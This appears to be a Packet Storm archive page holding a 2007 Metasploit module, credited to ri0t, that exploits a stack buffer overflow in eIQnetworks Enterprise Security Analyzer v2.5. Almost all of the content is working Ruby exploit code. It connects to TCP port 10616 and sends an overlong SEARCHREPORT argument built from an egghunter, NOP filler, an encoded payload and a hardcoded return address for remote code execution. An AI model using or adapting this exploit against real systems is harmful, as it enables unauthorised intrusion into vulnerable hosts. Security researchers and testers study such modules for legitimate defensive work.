what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

eiqnetworks-overflow.pm.txt

eiqnetworks-overflow.pm.txt
Posted Oct 25, 2007
Authored by ri0t

This Metasploit module exploits a stack overflow in eIQnetworks Enterprise Security Analyzer. During the processing of long arguments to the SEARCHREPORT command, a stack-based buffer overflow occurs.

tags | exploit, overflow
SHA-256 | b59fa257c22ba31ed748f5e72a2ac7cb05f08eee76bb554b52471571bc9ca419

eiqnetworks-overflow.pm.txt

Change Mirror Download
##
# $Id: eiqnetworks_esa.rb 4529 2007-03-12 01:08:18Z hdm $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##


require 'msf/core'

module Msf

class Exploits::Windows::Misc::Eiqnetworks_SEARCHREPORT < Msf::Exploit::Remote

include Exploit::Remote::Tcp
include Exploit::Remote::Egghunter

def initialize(info = {})
super(update_info(info,
'Name' => 'eIQNetworks ESA SEARCHREPORT Overflow',
'Description' => %q{
This module exploits a stack overflow in eIQnetworks
Enterprise Security Analyzer. During the processing of
long arguments to the SEARCHREPORT command, a stack-based
buffer overflow occurs.
},
'Author' => [ 'ri0t <ri0t[at]ri0tnet.net>', ],
'Version' => '$Revision: 4529 $',
'References' =>
[
],
'DefaultOptions' =>
{
'EXITFUNC' => 'seh',
},
'Payload' =>
{
'Space' => 1962,
'BadChars' => "\x00",
'ActiveTimeout' => 15,
},
'Platform' => 'win',

'Targets' =>
[
['EnterpriseSecurityAnalyzer v2.5 Universal', { 'Ret' => 0x55322a6a, 'Offset' => 1962 } ],

],

'Privileged' => false,

'DisclosureDate' => ''

))

register_options(
[
Opt::RPORT(10616)
], self.class)
end

def exploit
connect

print_status("Trying target #{target.name}...")

hunter = generate_egghunter()
egg = hunter[1]
filler = make_nops(target['Offset'] - payload.encoded.length)
sploit = "SEARCHREPORT&" + egg + egg + filler + payload.encoded + make_nops(12) + [target.ret].pack('V') + make_nops(12) + hunter[0] + "&";
puts sploit
sock.put(sploit)
handler
disconnect
end

end
end
Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    21 Files
  • 12
    Sep 12th
    40 Files
  • 13
    Sep 13th
    18 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    21 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close